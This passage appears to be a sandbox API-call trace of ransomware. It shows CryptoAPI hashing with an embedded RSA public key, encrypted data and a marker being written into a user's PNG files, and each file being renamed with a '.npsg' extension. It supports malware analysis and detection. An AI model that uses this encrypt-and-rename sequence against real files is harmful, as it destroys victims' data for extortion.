KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.239] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.240] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.240] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.240] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.240] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.240] GetLastError () returned 0x0 [0239.240] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.240] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.240] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.240] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.240] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.240] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x66d0) returned 0x3b95d50 [0239.241] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86678 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d10 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b866c0 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d88 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d28 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d58 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d40 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.242] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d40 | out: hHeap=0x620000) returned 1 [0239.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d58 | out: hHeap=0x620000) returned 1 [0239.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d58 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400d40 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400d28 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0239.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d40 | out: hHeap=0x620000) returned 1 [0239.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d58 | out: hHeap=0x620000) returned 1 [0239.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.243] GetCurrentThreadId () returned 0x5b4 [0239.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b87ee8 [0239.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0239.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0239.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.243] GetCurrentThreadId () returned 0x5b4 [0239.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0239.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0239.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d58 [0239.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d28 [0239.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0239.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400d40 [0239.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400d70 [0239.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88ce8 [0239.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d00 [0239.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d18 [0239.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d30 [0239.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d18 | out: hHeap=0x620000) returned 1 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d18 [0239.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d00 | out: hHeap=0x620000) returned 1 [0239.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400d28 [0239.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d58 | out: hHeap=0x620000) returned 1 [0239.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0239.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d30 | out: hHeap=0x620000) returned 1 [0239.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0239.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0239.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d28 | out: hHeap=0x620000) returned 1 [0239.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d18 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ce8 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d40 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d70 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0239.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400d88 | out: hHeap=0x620000) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b866c0 | out: hHeap=0x620000) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.248] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x66cb, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x66cb, lpOverlapped=0x0) returned 1 [0239.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0239.248] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x66d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.249] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0239.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0239.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0239.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0239.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0239.249] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0239.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.249] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.249] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.249] CloseHandle (hObject=0x644) returned 1 [0239.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393a30 [0239.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b89cd0 [0239.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393a30 | out: hHeap=0x620000) returned 1 [0239.251] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\jU8Tvw diV.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lvw4jn8h\\ju8tvw div.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\jU8Tvw diV.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lvw4jn8h\\ju8tvw div.png.npsg")) returned 1 [0239.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.252] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x620000) returned 1 [0239.253] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5902b270, ftCreationTime.dwHighDateTime=0x1d5be14, ftLastAccessTime.dwLowDateTime=0xd21c1510, ftLastAccessTime.dwHighDateTime=0x1d5c30b, ftLastWriteTime.dwLowDateTime=0xd21c1510, ftLastWriteTime.dwHighDateTime=0x1d5c30b, nFileSizeHigh=0x0, nFileSizeLow=0xf4da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q348xqwvaV.png", cAlternateFileName="Q348XQ~1.PNG")) returned 1 [0239.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0239.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e8f0 | out: hHeap=0x620000) returned 1 [0239.254] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\q348xqwvaV.png") returned=".png" [0239.254] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lvw4jN8h\\q348xqwvaV.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lvw4jn8h\\q348xqwvav.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.254] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=62682) returned 1 [0239.254] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.257] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf4b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.257] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.259] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.259] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xf4da, lpOverlapped=0x0) returned 1 [0239.260] lstrlenA (lpString="-----BEGIN PUBLIC 